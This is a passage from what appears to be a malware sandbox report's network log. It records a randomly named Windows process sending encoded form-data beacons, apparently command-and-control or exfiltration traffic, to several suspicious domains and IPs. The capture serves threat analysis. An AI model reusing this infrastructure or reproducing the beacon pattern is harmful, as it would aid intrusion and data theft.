                                                          Sep 11, 2024 22:03:34.588038921 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 10


                                                          Session ID: 10 | Source IP: 192.168.2.10 | Source Port: 49718 | Destination IP: 193.108.130.23 | Destination Port: 80 | PID: 4832 | Process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:36.094854116 CEST | 746 | OUT | POST /6iyv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Origin: http://www.drivemktg.co
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.drivemktg.co/6iyv/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=dWIDmaFMJdzFbVPVfronOo9Jwk++Mkxr+tgbkZ9yBXJusI9mHox4Si+BpJ8ViUM2ZdtbLcMmAoUnPWmtwxJ1Y2NNv+BEnfSbj/54oVADi9WQhHA+aUoZ/48jW171xSAby8ApYXEMMyp1l+XleVYdWoR8OfMOn6hqlsbcif8NFjotktvyAxAhBFtI4NoGjbRReLhW51QRYP4o9sB45g==
                                                          Sep 11, 2024 22:03:37.143892050 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          x-litespeed-tag: fae_HTTP.200
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://drivemktg.co/wp-json/>; rel="https://api.w.org/"
                                                          link: <https://drivemktg.co/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
                                                          link: <https://drivemktg.co/?p=10>; rel=shortlink
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          content-length: 9147
                                                          content-encoding: br
                                                          vary: Accept-Encoding,User-Agent
                                                          date: Wed, 11 Sep 2024 20:03:13 GMT
                                                          server: LiteSpeed


                                                          Session ID: 11 | Source IP: 192.168.2.10 | Source Port: 49719 | Destination IP: 193.108.130.23 | Destination Port: 80 | PID: 4832 | Process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:38.624823093 CEST | 1759 | OUT | POST /6iyv/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Origin: http://www.drivemktg.co
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.drivemktg.co/6iyv/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:39.725352049 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          x-litespeed-tag: fae_HTTP.200
                                                          content-type: text/html; charset=UTF-8
                                                          link: <https://drivemktg.co/wp-json/>; rel="https://api.w.org/"
                                                          link: <https://drivemktg.co/wp-json/wp/v2/pages/10>; rel="alternate"; title="JSON"; type="application/json"
                                                          link: <https://drivemktg.co/?p=10>; rel=shortlink
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          transfer-encoding: chunked
                                                          content-encoding: br
                                                          vary: Accept-Encoding,User-Agent
                                                          date: Wed, 11 Sep 2024 20:03:16 GMT
                                                          server: LiteSpeed


                                                          Session ID: 12 | Source IP: 192.168.2.10 | Source Port: 49720 | Destination IP: 193.108.130.23 | Destination Port: 80 | PID: 4832 | Process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:41.153753996 CEST | 459 | OUT | GET /6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.drivemktg.co
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:42.170047998 CEST | 440 | IN | HTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          x-powered-by: PHP/8.1.29
                                                          content-type: text/html; charset=UTF-8
                                                          x-redirect-by: WordPress
                                                          location: http://drivemktg.co/6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8
                                                          x-litespeed-cache: miss
                                                          content-length: 0
                                                          date: Wed, 11 Sep 2024 20:03:18 GMT
                                                          server: LiteSpeed
                                                          vary: User-Agent


                                                          Session ID: 13 | Source IP: 192.168.2.10 | Source Port: 49721 | Destination IP: 47.239.13.172 | Destination Port: 80 | PID: 4832 | Process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:47.902614117 CEST | 725 | OUT | POST /bqpw/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Origin: http://www.nbh6agr8h.sbs
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.nbh6agr8h.sbs/bqpw/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=2gTGj4wwUcbuOmGUvDtQfkpM0eASkz8tH+EjLH7aXKbJb4DVuBIULZ9P9yDOQgCM+hPLceprxVKoS55fTl1/iUwI4mi+ea7f7yBykFjFyhzU8V7v4v1UBzm8nkCejjt5Ec5PC4xWFKZ0YMSgORKIcA1SdebMzvdG4ac5Yj0PEmS9jAc5EjVf3LrmLhGh
                                                          Sep 11, 2024 22:03:48.831069946 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:48 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID: 14 | Source IP: 192.168.2.10 | Source Port: 49722 | Destination IP: 47.239.13.172 | Destination Port: 80 | PID: 4832 | Process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:50.434772968 CEST | 749 | OUT | POST /bqpw/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Origin: http://www.nbh6agr8h.sbs
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.nbh6agr8h.sbs/bqpw/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=2gTGj4wwUcbuPC6UjCtQOUpD6+AS9j9kH+4jLCCfU4PJbYTVvDgUKZ9P2SDHUgCD+gzpcf5rxVuoS4JfTWMpjEwKt2iwT67f7yBykBPvygbU8lrv4O1bCzm9uECenjt1Ec59C5twFJx0YNOgKQKLSA0ZZebZ2uEd0vkSfF4iRlLfpB9+Vy0Ik83oFnzL5eGk8aJ3LlPi3tpFlSTKrA==
                                                          Sep 11, 2024 22:03:51.334691048 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID: 15 | Source IP: 192.168.2.10 | Source Port: 49723 | Destination IP: 47.239.13.172 | Destination Port: 80 | PID: 4832 | Process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:03:52.969449043 CEST | 1762 | OUT | POST /bqpw/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Origin: http://www.nbh6agr8h.sbs
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.nbh6agr8h.sbs/bqpw/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:53.999375105 CEST  165                IN         HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:53 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          16          192.168.2.10  49724        47.239.13.172   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:03:55.497061014 CEST  460                OUT        GET /bqpw/?bFGXGTdX=7i7mgMVoUdn3K3H4hxR2Z2sx7NMDmz1WBuojPjrSQrb0L6/7xSQOb69NgDz1ThGB8kqobNNV7CaIX5kMC3tpqGoJwELsf5+TzHoCpSOUthnHuH68iQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.nbh6agr8h.sbs
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:03:56.395628929 CEST  224                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:03:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          17          192.168.2.10  49725        154.213.157.32  80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:02.810854912 CEST  716                OUT        POST /qii2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Origin: http://www.54bxd.cyou
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.54bxd.cyou/qii2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=BwoHHagtoAFrNAMVFErDimwkWV+FTv4qnfIcal6bVN8j1iFxmCNTTYPbQRLVwhOZUdDe57f0saCYxoEQMIaHU4C9MkhZF56dGqNuOnMPf0cndDipQ5EVmulhQFAZm2EE4zWUSQXSm+dkgapfNTw0SLJ53YI65drT6m4JUPMa+SQx7supLr1UBZ5DFLf5


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          18          192.168.2.10  49726        154.213.157.32  80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:05.346828938 CEST  740                OUT        POST /qii2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Origin: http://www.54bxd.cyou
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.54bxd.cyou/qii2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=BwoHHagtoAFrMh8VDnTDkGwnKl+FaP4mnfMcanWLV/Yj7iVx02hTQYPbYxLUuROSUder5+30sZ+YxtgQM7yEVoC/DEhbaJ6dGqNuOno2fw4nczSpRdoavOlmAlAZi2EA4zWqSR6Pm7BkgftfDiw1JbIy44J+8d+GwWEKdOoUoCdU4NPua6UDSulNLNqT6LXqzRpskVETrLuJcA5ncw==


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          19          192.168.2.10  49727        154.213.157.32  80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:07.873356104 CEST  1753               OUT        POST /qii2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Origin: http://www.54bxd.cyou
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.54bxd.cyou/qii2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          20          192.168.2.10  49728        154.213.157.32  80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:10.404664993 CEST  457                OUT        GET /qii2/?bFGXGTdX=MyAnEvAqgx9IHgh7O1f7tHhASGGjAfpU9Y1SDE6GUOU+/QpZ0wdWe4W7KVnq9zWaa6WrnYnil8yz0OBRRbaeb4KuJn8nSoXQG6ZxMFNQIXEXLDmqOQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.54bxd.cyou
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          21          192.168.2.10  49729        47.239.13.172   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:37.402867079 CEST  725                OUT        POST /zqqa/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Origin: http://www.r7xzr3ib0.sbs
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.r7xzr3ib0.sbs/zqqa/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=UV/JIifXrX3MOT6ZPLel8Dxv8cp6nWzVrx420+wzZy9QrVD5RUZVXiL7E57qdc09ph8SiB+/HwUPTVtwnyMz10/y+A6vi6QzQ+3sco+N/lhsJoxwc46ADGKjhimHYcvWbfWJadxHZ1PkOf1s0aRw3DccHuKSMOcvXozPAFlTigtftjoNyEE8CRPInIv6
                                                          Sep 11, 2024 22:04:38.312841892 CEST  165                IN         HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:38 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          22          192.168.2.10  49730        47.239.13.172   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:39.935009003 CEST  749                OUT        POST /zqqa/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Origin: http://www.r7xzr3ib0.sbs
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.r7xzr3ib0.sbs/zqqa/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=UV/JIifXrX3McCKZNsKlsTxoy8p68Gy9rxE20/0jZHlQoxL5QVZVCiL7LZ7jT802ph4aiBy/HwAPTX1wnDMwnU/n2g7psaQzQ+3scoqj/lpsJZhwcZ6DfWKigimHPMudbfWracsSZzDkOb9s0rR3+Dd2IOLXJuB/QI78Azgak2tbqCJKjVlrRmTGpOaQVk5a96RCio009LqEMMigXg==
                                                          Sep 11, 2024 22:04:40.849977016 CEST  165                IN         HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          23          192.168.2.10  49731        47.239.13.172   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:42.466953993 CEST  1762               OUT        POST /zqqa/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Origin: http://www.r7xzr3ib0.sbs
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.r7xzr3ib0.sbs/zqqa/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:43.621826887 CEST  165                IN         HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1
                                                          Sep 11, 2024 22:04:43.623411894 CEST  165                IN         HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          24          192.168.2.10  49732        47.239.13.172   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:45.001075029 CEST  460                OUT        GET /zqqa/?bFGXGTdX=ZXXpLVL5zGXuIyziXd74rR8Z9u95/Dmogjom9+EAQEp6mmLdAUlPVhz6U9vRTuA6wBlP9h+HTHItH2gyziEy2Gmm5hf6oNdAA8n0WZPfrmRJWLBYJQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.r7xzr3ib0.sbs
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:45.907720089 CEST  224                IN         HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:04:45 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          25          192.168.2.10  49733        91.195.240.19   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:50.969106913 CEST  746                OUT        POST /zwgt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Origin: http://www.bitmapsportsbook.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.bitmapsportsbook.com/zwgt/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=QA8LpfJwy5yz5TC9jOHT1Hoah+0c/TPoVgVZ6t7f1eWor8ofwi7mK/paqroLDfnWri87rApG0NDCfCimfCpzaofh0PquBMtBVdCPGErixG4Mvx7NH0o7+QZ8FfsKHgcRFfVvGEXsCJ5CQHqy6kCZuQyKPU0y8l0x4s3IYMQhCOp2k/jdG0SVC63FJgEb
                                                          Sep 11, 2024 22:04:51.625551939 CEST  208                IN         HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                          26          192.168.2.10  49734        91.195.240.19   80                4832  C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp                             Bytes transferred  Direction  Data
                                                          Sep 11, 2024 22:04:53.498609066 CEST  770                OUT        POST /zwgt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Origin: http://www.bitmapsportsbook.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.bitmapsportsbook.com/zwgt/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:54.155144930 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          27 | 192.168.2.10 | 49735 | 91.195.240.19 | 80 | 4832 | C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:04:56.030184984 CEST | 1783 | OUT | POST /zwgt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.bitmapsportsbook.com
                                                          Origin: http://www.bitmapsportsbook.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.bitmapsportsbook.com/zwgt/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:04:56.682657003 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
